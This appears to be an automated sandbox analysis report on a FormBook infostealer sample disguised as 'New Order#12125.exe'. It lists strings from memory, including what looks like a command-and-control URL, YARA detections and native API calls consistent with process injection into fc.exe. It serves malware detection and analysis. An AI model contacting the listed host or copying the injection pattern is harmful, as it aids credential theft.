              Source: fc.exe, 00000004.00000003.1993037096.0000000007EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: fc.exe, 00000004.00000003.1993037096.0000000007EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: fc.exe, 00000004.00000002.3864506422.000000000470C000.00000004.10000000.00040000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000007.00000002.3862506319.00000000033AC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
              Source: fc.exe, 00000004.00000002.3852014344.0000000003083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: fc.exe, 00000004.00000002.3852014344.0000000003083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
              Source: fc.exe, 00000004.00000003.1987999474.0000000007E43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
              Source: fc.exe, 00000004.00000002.3852014344.0000000003083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: fc.exe, 00000004.00000002.3852014344.0000000003083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033$J
              Source: fc.exe, 00000004.00000002.3852014344.0000000003083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
              Source: fc.exe, 00000004.00000002.3852014344.0000000003083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: fc.exe, 00000004.00000002.3852014344.0000000003083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
              Source: fc.exe, 00000004.00000003.1993037096.0000000007EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: fc.exe, 00000004.00000002.3864506422.000000000520A000.00000004.10000000.00040000.00000000.sdmp, fc.exe, 00000004.00000002.3866047110.0000000006420000.00000004.00000800.00020000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000007.00000002.3862506319.0000000003EAA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: fc.exe, 00000004.00000003.1993037096.0000000007EAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: fc.exe, 00000004.00000002.3864506422.000000000539C000.00000004.10000000.00040000.00000000.sdmp, XcmmvCqVSCAb.exe, 00000007.00000002.3862506319.000000000403C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sonixingenuine.shop/01c7/?XxGx=INH0eLoh&60q4=YTigy0/11EA1EDERDWqOfMNZXkK2gBVueN49sLqr1to

              E-Banking Fraud

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.New Order#12125.exe.290000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1802187865.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3862175429.0000000003340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3862316494.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1801757859.0000000000291000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3849108726.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3862461350.0000000003C00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1805331540.00000000022F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Initial sample is a PE file and has a suspicious name
              Source: initial sampleStatic PE information: Filename: New Order#12125.exe
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_002BCB43 NtClose,0_2_002BCB43
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542B60 NtClose,LdrInitializeThunk,0_2_01542B60
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542DF0 NtQuerySystemInformation,LdrInitializeThunk,0_2_01542DF0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542C70 NtFreeVirtualMemory,LdrInitializeThunk,0_2_01542C70
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015435C0 NtCreateMutant,LdrInitializeThunk,0_2_015435C0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01544340 NtSetContextThread,0_2_01544340
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01544650 NtSuspendThread,0_2_01544650
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542BF0 NtAllocateVirtualMemory,0_2_01542BF0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542BE0 NtQueryValueKey,0_2_01542BE0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542B80 NtQueryInformationFile,0_2_01542B80
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542BA0 NtEnumerateValueKey,0_2_01542BA0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542AD0 NtReadFile,0_2_01542AD0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542AF0 NtWriteFile,0_2_01542AF0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542AB0 NtWaitForSingleObject,0_2_01542AB0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542D10 NtMapViewOfSection,0_2_01542D10
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542D00 NtSetInformationFile,0_2_01542D00
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542D30 NtUnmapViewOfSection,0_2_01542D30
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542DD0 NtDelayExecution,0_2_01542DD0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542DB0 NtEnumerateKey,0_2_01542DB0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542C60 NtCreateKey,0_2_01542C60
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542C00 NtQueryInformationProcess,0_2_01542C00
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542CC0 NtQueryVirtualMemory,0_2_01542CC0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542CF0 NtOpenProcess,0_2_01542CF0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542CA0 NtQueryInformationToken,0_2_01542CA0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542F60 NtCreateProcessEx,0_2_01542F60
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542F30 NtCreateSection,0_2_01542F30
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542FE0 NtCreateFile,0_2_01542FE0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542F90 NtProtectVirtualMemory,0_2_01542F90
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542FB0 NtResumeThread,0_2_01542FB0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542FA0 NtQuerySection,0_2_01542FA0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542E30 NtWriteVirtualMemory,0_2_01542E30
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542EE0 NtQueueApcThread,0_2_01542EE0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542E80 NtReadVirtualMemory,0_2_01542E80
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01542EA0 NtAdjustPrivilegesToken,0_2_01542EA0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01543010 NtOpenDirectoryObject,0_2_01543010
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01543090 NtSetValueKey,0_2_01543090
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015439B0 NtGetContextThread,0_2_015439B0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01543D70 NtOpenThread,0_2_01543D70
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01543D10 NtOpenProcessToken,0_2_01543D10
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03724340 NtSetContextThread,LdrInitializeThunk,4_2_03724340
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03724650 NtSuspendThread,LdrInitializeThunk,4_2_03724650
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722B60 NtClose,LdrInitializeThunk,4_2_03722B60
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_03722BF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722BE0 NtQueryValueKey,LdrInitializeThunk,4_2_03722BE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_03722BA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722AF0 NtWriteFile,LdrInitializeThunk,4_2_03722AF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722AD0 NtReadFile,LdrInitializeThunk,4_2_03722AD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722F30 NtCreateSection,LdrInitializeThunk,4_2_03722F30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722FE0 NtCreateFile,LdrInitializeThunk,4_2_03722FE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722FB0 NtResumeThread,LdrInitializeThunk,4_2_03722FB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722EE0 NtQueueApcThread,LdrInitializeThunk,4_2_03722EE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_03722E80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_03722D30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722D10 NtMapViewOfSection,LdrInitializeThunk,4_2_03722D10
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_03722DF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722DD0 NtDelayExecution,LdrInitializeThunk,4_2_03722DD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_03722C70
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722C60 NtCreateKey,LdrInitializeThunk,4_2_03722C60
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_03722CA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037235C0 NtCreateMutant,LdrInitializeThunk,4_2_037235C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037239B0 NtGetContextThread,LdrInitializeThunk,4_2_037239B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722B80 NtQueryInformationFile,4_2_03722B80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722AB0 NtWaitForSingleObject,4_2_03722AB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722F60 NtCreateProcessEx,4_2_03722F60
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722FA0 NtQuerySection,4_2_03722FA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722F90 NtProtectVirtualMemory,4_2_03722F90
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722E30 NtWriteVirtualMemory,4_2_03722E30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722EA0 NtAdjustPrivilegesToken,4_2_03722EA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722D00 NtSetInformationFile,4_2_03722D00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722DB0 NtEnumerateKey,4_2_03722DB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722C00 NtQueryInformationProcess,4_2_03722C00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722CF0 NtOpenProcess,4_2_03722CF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03722CC0 NtQueryVirtualMemory,4_2_03722CC0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03723010 NtOpenDirectoryObject,4_2_03723010
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03723090 NtSetValueKey,4_2_03723090
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03723D70 NtOpenThread,4_2_03723D70
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03723D10 NtOpenProcessToken,4_2_03723D10
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E793B0 NtCreateFile,4_2_02E793B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E796B0 NtClose,4_2_02E796B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E79610 NtDeleteFile,4_2_02E79610
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E79520 NtReadFile,4_2_02E79520
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_02E79820 NtAllocateVirtualMemory,4_2_02E79820
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_00291A990_2_00291A99
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_002A8B130_2_002A8B13
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_002928BC0_2_002928BC
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_002928C00_2_002928C0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_002BF1630_2_002BF163
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_002932050_2_00293205
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_002932100_2_00293210
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_002A03130_2_002A0313
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_002A05330_2_002A0533
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_002A6D0E0_2_002A6D0E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_002A6D130_2_002A6D13
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0029E5130_2_0029E513
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0029E5120_2_0029E512
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0029E6630_2_0029E663
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0029467A0_2_0029467A
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0029E6570_2_0029E657
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015981580_2_01598158
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015AA1180_2_015AA118
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015001000_2_01500100
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015C81CC0_2_015C81CC
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015D01AA0_2_015D01AA
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015C41A20_2_015C41A2
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015A20000_2_015A2000
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015CA3520_2_015CA352
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0151E3F00_2_0151E3F0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015D03E60_2_015D03E6
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015B02740_2_015B0274
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015902C00_2_015902C0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015105350_2_01510535
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015D05910_2_015D0591
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015C24460_2_015C2446
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015B44200_2_015B4420
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015BE4F60_2_015BE4F6
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015347500_2_01534750
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015107700_2_01510770
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150C7C00_2_0150C7C0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152C6E00_2_0152C6E0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015269620_2_01526962
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015129A00_2_015129A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015DA9A60_2_015DA9A6
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0151A8400_2_0151A840
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015128400_2_01512840
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153E8F00_2_0153E8F0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014F68B80_2_014F68B8
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015CAB400_2_015CAB40
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015C6BD70_2_015C6BD7
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150EA800_2_0150EA80
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015ACD1F0_2_015ACD1F
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0151AD000_2_0151AD00
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150ADE00_2_0150ADE0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01528DBF0_2_01528DBF
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510C000_2_01510C00
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01500CF20_2_01500CF2
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015B0CB50_2_015B0CB5
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01584F400_2_01584F40
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01530F300_2_01530F30
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015B2F300_2_015B2F30
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01552F280_2_01552F28
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01502FC80_2_01502FC8
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0151CFE00_2_0151CFE0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158EFA00_2_0158EFA0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510E590_2_01510E59
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015CEE260_2_015CEE26
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015CEEDB0_2_015CEEDB
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01522E900_2_01522E90
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015CCE930_2_015CCE93
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015DB16B0_2_015DB16B
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0154516C0_2_0154516C
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014FF1720_2_014FF172
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0151B1B00_2_0151B1B0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015170C00_2_015170C0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015BF0CC0_2_015BF0CC
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015C70E90_2_015C70E9
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015CF0E00_2_015CF0E0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014FD34C0_2_014FD34C
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015C132D0_2_015C132D
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0155739A0_2_0155739A
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152B2C00_2_0152B2C0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015B12ED0_2_015B12ED
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015152A00_2_015152A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015C75710_2_015C7571
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015D95C30_2_015D95C3
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015AD5B00_2_015AD5B0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015014600_2_01501460
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015CF43F0_2_015CF43F
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015CF7B00_2_015CF7B0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015556300_2_01555630
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015C16CC0_2_015C16CC
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015199500_2_01519950
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152B9500_2_0152B950
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015A59100_2_015A5910
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157D8000_2_0157D800
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015138E00_2_015138E0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015CFB760_2_015CFB76
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01585BF00_2_01585BF0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0154DBF90_2_0154DBF9
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152FB800_2_0152FB80
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015CFA490_2_015CFA49
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015C7A460_2_015C7A46
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01583A6C0_2_01583A6C
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015BDAC60_2_015BDAC6
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01555AA00_2_01555AA0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015ADAAC0_2_015ADAAC
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015B1AA30_2_015B1AA3
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015C1D5A0_2_015C1D5A
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01513D400_2_01513D40
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015C7D730_2_015C7D73
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152FDC00_2_0152FDC0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01589C320_2_01589C32
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015CFCF20_2_015CFCF2
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015CFF090_2_015CFF09
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01511F920_2_01511F92
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015CFFB10_2_015CFFB1
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01519EB00_2_01519EB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037AA3524_2_037AA352
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037B03E64_2_037B03E6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036FE3F04_2_036FE3F0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037902744_2_03790274
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037702C04_2_037702C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037781584_2_03778158
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0378A1184_2_0378A118
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036E01004_2_036E0100
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037A81CC4_2_037A81CC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037B01AA4_2_037B01AA
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037A41A24_2_037A41A2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037820004_2_03782000
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036F07704_2_036F0770
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037147504_2_03714750
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036EC7C04_2_036EC7C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0370C6E04_2_0370C6E0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036F05354_2_036F0535
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037B05914_2_037B0591
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037A24464_2_037A2446
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037944204_2_03794420
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0379E4F64_2_0379E4F6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037AAB404_2_037AAB40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037A6BD74_2_037A6BD7
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036EEA804_2_036EEA80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037069624_2_03706962
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036F29A04_2_036F29A0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037BA9A64_2_037BA9A6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036F28404_2_036F2840
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036FA8404_2_036FA840
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0371E8F04_2_0371E8F0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036D68B84_2_036D68B8
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03764F404_2_03764F40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03710F304_2_03710F30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03792F304_2_03792F30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03732F284_2_03732F28
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036FCFE04_2_036FCFE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036E2FC84_2_036E2FC8
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0376EFA04_2_0376EFA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036F0E594_2_036F0E59
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037AEE264_2_037AEE26
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037AEEDB4_2_037AEEDB
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03702E904_2_03702E90
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_037ACE934_2_037ACE93
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_0378CD1F4_2_0378CD1F
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036FAD004_2_036FAD00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_036EADE04_2_036EADE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 4_2_03708DBF4_2_03708DBF
